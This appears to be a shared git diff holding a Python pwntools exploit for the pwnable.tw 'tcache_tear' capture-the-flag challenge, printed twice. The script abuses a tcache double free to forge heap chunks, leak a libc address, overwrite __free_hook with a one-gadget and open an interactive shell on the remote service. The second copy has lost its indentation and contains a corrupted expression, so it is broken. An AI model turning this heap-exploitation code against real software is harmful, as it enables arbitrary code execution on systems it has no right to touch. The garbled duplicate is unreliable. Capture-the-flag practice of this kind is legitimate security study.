TommyWu-fdgkhdkgh · October 8, 2019 17:07
diff --git a/tcache_tear.py b/tcache_tear.py
 from pwn import *
 import sys


 def malloc(size, data):
    r.recvuntil("choice :")
    r.sendline("1")
    r.recvuntil("Size:")
    r.sendline(str(size))
    r.recvuntil("Data:")
    r.send(data)

 def free():
    r.recvuntil("choice :")
    r.sendline("2")

 def info():
    r.recvuntil("choice :")
    r.sendline("3")

 def exit():
    r.recvuntil("choice :")
    r.sendline("4")


 #select remote or local
 if len(sys.argv) == 2:
        if  sys.argv[1][0]=='l':
                #r = process("./applestore", env={"LD_LIBRARY_PATH" : "/lib32"})
                r = process("./tcache_tear")
        else:
                r = remote("chall.pwnable.tw",10207)
 else:
        print "gg"


 def p_pid():
        if sys.argv[1][0]=='l':
                print "pid " + str(proc.pidof(r))

 start_addr = 0x6020a0

 r.recvuntil("Name:")
 r.sendline(p64(0x0)+p64(0x91))

 got_stdin = 0x602020
 name_addr = 0x602060
 chunck_addr = 0x602088



 malloc(0xf0, "gg")

 free()
 free()

 malloc(0xf0, p64(name_addr+0x10))
 malloc(0xf0, p64(name_addr+0x10))

 #put the fake chunks
 malloc(0xf0, p64(name_addr+0x10)*2*8+p64(0)+p64(0x31)+"\x00"*0x28+p64(0x31))


 raw_input()

 #######

 malloc(0x80, p64(0))

 free()
 free()

 #malloc(0x90, p64(heapbase+0x260))
 malloc(0x80, p64(name_addr+0x10))
 malloc(0x80, "gg")

 malloc(0x80, "\x00"*8)

 raw_input()

 free()

 raw_input()
 info()

 words = r.recvuntil("Name :")
 words = r.recvuntil("$$$")
 words = words[16:24]

 libcbase = u64(words)
 libcbase = libcbase - 0x3ebca0
 print "libcbase : " + hex(libcbase)

 #leak libc

 ################

 malloc_hook = libcbase + 0x3ebc30
 free_hook   = libcbase + 0x3ed8e8
 main_addr   = 0x400bc7

 malloc(0x40, "gg")

 free()
 free()

 #malloc(0x40, p64(malloc_hook))
 malloc(0x40, p64(free_hook))
 malloc(0x40, "gg")

 malloc(0x40, p64(libcbase+0x4f322))

 print "malloc_hook : " + hex(malloc_hook)

 free()
 p_pid()

 r.interactive()
	from pwn import *
	import sys


	def malloc(size, data):
	r.recvuntil("choice :")
	r.sendline("1")
	r.recvuntil("Size:")
	r.sendline(str(size))
	r.recvuntil("Data:")
	r.send(data)

	def free():
	r.recvuntil("choice :")
	r.sendline("2")

	def info():
	r.recvuntil("choice :")
	r.sendline("3")

	def exit():
	r.recvuntil("choice :")
	r.sendline("4")


	#select remote or local
	if len(sys.argv) == 2:
	if sys.argv[1][0]=='l':
	#r = process("./applestore", env={"LD_LIBRARY_PATH" : "/lib32"})
	r = process("./tcache_tear")
	else:
	r = remote("chall.pwnable.tw",10207)
	else:
	print "gg"


	def p_pid():
	if sys.argv[1][0]=='l':
	print "pid " + str(proc.pidof(r))

	start_addr = 0x6020a0

	r.recvuntil("Name:")
	r.sendline(p64(0x0)+p64(0x91))

	got_stdin = 0x602020
	name_addr = 0x602060
	chunck_addr = 0x602088



	malloc(0xf0, "gg")

	free()
	free()

	malloc(0xf0, p64(name_addr+0x10))
	malloc(0xf0, p64(name_addr+0x10))

	#put the fake chunks
	malloc(0xf0, p64(name_addr+0x10)28+p64(0)+p64(0x31)+"\x00"*0x28+p64(0x31))


	raw_input()

	#######

	malloc(0x80, p64(0))

	free()
	free()

	#malloc(0x90, p64(heapbase+0x260))
	malloc(0x80, p64(name_addr+0x10))
	malloc(0x80, "gg")

	malloc(0x80, "\x00"*8)

	raw_input()

	free()

	raw_input()
	info()

	words = r.recvuntil("Name :")
	words = r.recvuntil("$$$")
	words = words[16:24]

	libcbase = u64(words)
	libcbase = libcbase - 0x3ebca0
	print "libcbase : " + hex(libcbase)

	#leak libc

	################

	malloc_hook = libcbase + 0x3ebc30
	free_hook = libcbase + 0x3ed8e8
	main_addr = 0x400bc7

	malloc(0x40, "gg")

	free()
	free()

	#malloc(0x40, p64(malloc_hook))
	malloc(0x40, p64(free_hook))
	malloc(0x40, "gg")

	malloc(0x40, p64(libcbase+0x4f322))

	print "malloc_hook : " + hex(malloc_hook)

	free()
	p_pid()

	r.interactive()
No results found